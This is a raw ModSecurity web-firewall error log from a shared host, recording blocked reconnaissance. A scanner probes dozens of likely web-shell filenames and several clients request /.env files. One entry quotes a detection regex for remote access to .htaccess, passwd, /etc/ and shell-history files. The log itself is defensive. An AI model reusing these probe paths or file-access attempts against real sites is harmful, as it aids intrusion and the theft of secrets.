[Tue May 26 16:51:16.069798 2026] [security2:error] [pid 817651:tid 817807] [client 20.206.111.203:6033] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWCLNlGRCPPN1dS2y3BnQAAAJ8"]
[Tue May 26 16:51:16.521000 2026] [security2:error] [pid 817651:tid 817817] [client 20.206.111.203:6025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWCLNlGRCPPN1dS2y3BoQAAAKk"]
[Tue May 26 16:51:16.521134 2026] [security2:error] [pid 817651:tid 817817] [client 20.206.111.203:6025] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWCLNlGRCPPN1dS2y3BoQAAAKk"]
[Tue May 26 16:51:16.637006 2026] [security2:error] [pid 817651:tid 817897] [client 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCK9lGRCPPN1dS2y3BmAAA-Rs"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:16.748663 2026] [security2:error] [pid 823496:tid 823653] [client 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCK5a08mrtyBNpA4PkLAAAGR4"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:16.767974 2026] [security2:error] [pid 823496:tid 823563] [remote 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCK5a08mrtyBNpA4PkLgAAF0A"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:16.781550 2026] [security2:error] [pid 823496:tid 823748] [client 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCK5a08mrtyBNpA4PkIAAAeFU"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:16.999919 2026] [security2:error] [pid 817651:tid 817835] [client 20.206.111.203:6093] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWCLNlGRCPPN1dS2y3BqAAAALs"]
[Tue May 26 16:51:17.000034 2026] [security2:error] [pid 817651:tid 817835] [client 20.206.111.203:6093] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWCLNlGRCPPN1dS2y3BqAAAALs"]
[Tue May 26 16:51:17.023367 2026] [security2:error] [pid 823496:tid 823715] [client 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCK5a08mrtyBNpA4PkNQAAVyc"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:17.057873 2026] [security2:error] [pid 823496:tid 823731] [client 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCK5a08mrtyBNpA4PkNgAAZxc"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:17.388035 2026] [security2:error] [pid 817651:tid 817831] [client 20.206.111.203:6102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWCLdlGRCPPN1dS2y3BrQAAALc"]
[Tue May 26 16:51:17.388141 2026] [security2:error] [pid 817651:tid 817831] [client 20.206.111.203:6102] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWCLdlGRCPPN1dS2y3BrQAAALc"]
[Tue May 26 16:51:17.733862 2026] [security2:error] [pid 817651:tid 817867] [client 146.174.184.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCK9lGRCPPN1dS2y3BlQAAANs"]
[Tue May 26 16:51:17.870724 2026] [security2:error] [pid 823496:tid 823665] [client 20.206.111.203:6127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWCLZa08mrtyBNpA4PkSwAAACU"]
[Tue May 26 16:51:17.870826 2026] [security2:error] [pid 823496:tid 823665] [client 20.206.111.203:6127] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWCLZa08mrtyBNpA4PkSwAAACU"]
[Tue May 26 16:51:17.987924 2026] [security2:error] [pid 817651:tid 817828] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCK9lGRCPPN1dS2y3BmgAAALQ"]
[Tue May 26 16:51:18.240537 2026] [security2:error] [pid 823496:tid 823681] [client 20.206.111.203:6129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWCLpa08mrtyBNpA4PkTAAAADU"]
[Tue May 26 16:51:18.240660 2026] [security2:error] [pid 823496:tid 823681] [client 20.206.111.203:6129] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWCLpa08mrtyBNpA4PkTAAAADU"]
[Tue May 26 16:51:18.690466 2026] [security2:error] [pid 817651:tid 817794] [client 20.206.111.203:6141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWCLtlGRCPPN1dS2y3BtQAAAJI"]
[Tue May 26 16:51:18.690557 2026] [security2:error] [pid 817651:tid 817794] [client 20.206.111.203:6141] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWCLtlGRCPPN1dS2y3BtQAAAJI"]
[Tue May 26 16:51:19.003720 2026] [security2:error] [pid 823496:tid 823532] [remote 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCLpa08mrtyBNpA4PkTwAACiE"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:19.167257 2026] [security2:error] [pid 823496:tid 823714] [client 20.206.111.203:6117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWCL5a08mrtyBNpA4PkVgAAAFY"]
[Tue May 26 16:51:19.167373 2026] [security2:error] [pid 823496:tid 823714] [client 20.206.111.203:6117] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWCL5a08mrtyBNpA4PkVgAAAFY"]
[Tue May 26 16:51:19.387361 2026] [security2:error] [pid 817651:tid 817727] [remote 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCLtlGRCPPN1dS2y3BsAAA7ks"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:19.403930 2026] [security2:error] [pid 817651:tid 817863] [client 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCLdlGRCPPN1dS2y3BrwAA1x4"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:19.588031 2026] [security2:error] [pid 817651:tid 817787] [client 20.206.111.203:6135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWCL9lGRCPPN1dS2y3BvgAAAIs"]
[Tue May 26 16:51:19.588173 2026] [security2:error] [pid 817651:tid 817787] [client 20.206.111.203:6135] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWCL9lGRCPPN1dS2y3BvgAAAIs"]
[Tue May 26 16:51:19.813551 2026] [security2:error] [pid 823496:tid 823751] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCLpa08mrtyBNpA4PkTgAAAHs"]
[Tue May 26 16:51:19.973854 2026] [security2:error] [pid 817651:tid 817839] [client 20.206.111.203:6030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWCL9lGRCPPN1dS2y3BvwAAAL8"]
[Tue May 26 16:51:19.973939 2026] [security2:error] [pid 817651:tid 817839] [client 20.206.111.203:6030] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWCL9lGRCPPN1dS2y3BvwAAAL8"]
[Tue May 26 16:51:20.340596 2026] [security2:error] [pid 823496:tid 823720] [client 176.65.139.237:62868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/.env"] [unique_id "ahWCMJa08mrtyBNpA4PkZQAAAFw"]
[Tue May 26 16:51:20.364443 2026] [security2:error] [pid 817651:tid 817848] [client 20.206.111.203:6098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWCMNlGRCPPN1dS2y3BwQAAAMg"]
[Tue May 26 16:51:20.364535 2026] [security2:error] [pid 817651:tid 817848] [client 20.206.111.203:6098] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWCMNlGRCPPN1dS2y3BwQAAAMg"]
[Tue May 26 16:51:20.737455 2026] [security2:error] [pid 817651:tid 817849] [client 20.206.111.203:6055] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahWCMNlGRCPPN1dS2y3BygAAAMk"]
[Tue May 26 16:51:21.119379 2026] [security2:error] [pid 817651:tid 817734] [remote 2401:4900:630f:8d17:3812:19ff:fef1:c121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWCMNlGRCPPN1dS2y3BxAAA7FI"], referer: https://kingsclub.in/banquets/
[Tue May 26 16:51:21.331708 2026] [security2:error] [pid 823496:tid 823692] [client 20.206.111.203:6081] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCMZa08mrtyBNpA4PkewAAAEA"]
[Tue May 26 16:51:21.511418 2026] [security2:error] [pid 817651:tid 817840] [client 20.206.111.203:6055] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-admin/js/"] [unique_id "ahWCMdlGRCPPN1dS2y3B1AAAAMA"]
[Tue May 26 16:51:21.650389 2026] [security2:error] [pid 823496:tid 823640] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCMJa08mrtyBNpA4PkZgAAAAw"]
[Tue May 26 16:51:21.692395 2026] [security2:error] [pid 823496:tid 823747] [client 20.206.111.203:6081] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCMZa08mrtyBNpA4PkgwAAAHc"]
[Tue May 26 16:51:21.869323 2026] [security2:error] [pid 817651:tid 817830] [client 20.206.111.203:6055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWCMdlGRCPPN1dS2y3B1wAAALY"]
[Tue May 26 16:51:21.869469 2026] [security2:error] [pid 817651:tid 817830] [client 20.206.111.203:6055] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWCMdlGRCPPN1dS2y3B1wAAALY"]
[Tue May 26 16:51:22.280837 2026] [security2:error] [pid 823496:tid 823753] [client 20.206.111.203:6104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahWCMpa08mrtyBNpA4PkiAAAAH0"]
[Tue May 26 16:51:22.280941 2026] [security2:error] [pid 823496:tid 823753] [client 20.206.111.203:6104] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahWCMpa08mrtyBNpA4PkiAAAAH0"]
[Tue May 26 16:51:22.771400 2026] [security2:error] [pid 823496:tid 823657] [client 20.206.111.203:6126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahWCMpa08mrtyBNpA4PkjgAAAB0"]
[Tue May 26 16:51:22.771516 2026] [security2:error] [pid 823496:tid 823657] [client 20.206.111.203:6126] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahWCMpa08mrtyBNpA4PkjgAAAB0"]
[Tue May 26 16:51:23.176096 2026] [security2:error] [pid 817651:tid 817847] [client 20.206.111.203:6114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWCM9lGRCPPN1dS2y3B3QAAAMc"]
[Tue May 26 16:51:23.176186 2026] [security2:error] [pid 817651:tid 817847] [client 20.206.111.203:6114] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWCM9lGRCPPN1dS2y3B3QAAAMc"]
[Tue May 26 16:51:23.345408 2026] [security2:error] [pid 823496:tid 823656] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCMZa08mrtyBNpA4PkggAAABw"]
[Tue May 26 16:51:23.647430 2026] [security2:error] [pid 823496:tid 823661] [client 20.206.111.203:6034] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wordpress/wp-admin/maint/"] [unique_id "ahWCM5a08mrtyBNpA4PklQAAACE"]
[Tue May 26 16:51:23.834329 2026] [security2:error] [pid 823496:tid 823673] [client 20.206.111.203:6081] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCM5a08mrtyBNpA4PkmAAAAC0"]
[Tue May 26 16:51:23.993207 2026] [security2:error] [pid 823496:tid 823523] [remote 74.7.241.58:50126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWCM5a08mrtyBNpA4PknQAAMxg"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:51:24.021668 2026] [security2:error] [pid 823496:tid 823705] [client 20.206.111.203:6034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWCNJa08mrtyBNpA4PkngAAAE0"]
[Tue May 26 16:51:24.021790 2026] [security2:error] [pid 823496:tid 823705] [client 20.206.111.203:6034] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWCNJa08mrtyBNpA4PkngAAAE0"]
[Tue May 26 16:51:24.433652 2026] [security2:error] [pid 823496:tid 823649] [client 20.206.111.203:6100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahWCNJa08mrtyBNpA4PkpQAAABU"]
[Tue May 26 16:51:24.433768 2026] [security2:error] [pid 823496:tid 823649] [client 20.206.111.203:6100] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahWCNJa08mrtyBNpA4PkpQAAABU"]
[Tue May 26 16:51:24.604551 2026] [security2:error] [pid 823496:tid 823630] [client 85.11.167.19:42702] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "azurmediatec.com"] [uri "/.env"] [unique_id "ahWCNJa08mrtyBNpA4PkpwAAAAI"]
[Tue May 26 16:51:24.955557 2026] [security2:error] [pid 817651:tid 817822] [client 20.206.111.203:6036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWCNNlGRCPPN1dS2y3B6gAAAK4"]
[Tue May 26 16:51:24.955679 2026] [security2:error] [pid 817651:tid 817822] [client 20.206.111.203:6036] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWCNNlGRCPPN1dS2y3B6gAAAK4"]
[Tue May 26 16:51:25.243778 2026] [security2:error] [pid 823496:tid 823727] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCNJa08mrtyBNpA4PkoAAAAGM"]
[Tue May 26 16:51:25.322482 2026] [security2:error] [pid 823496:tid 823699] [client 20.206.111.203:6045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahWCNZa08mrtyBNpA4PkswAAAEc"]
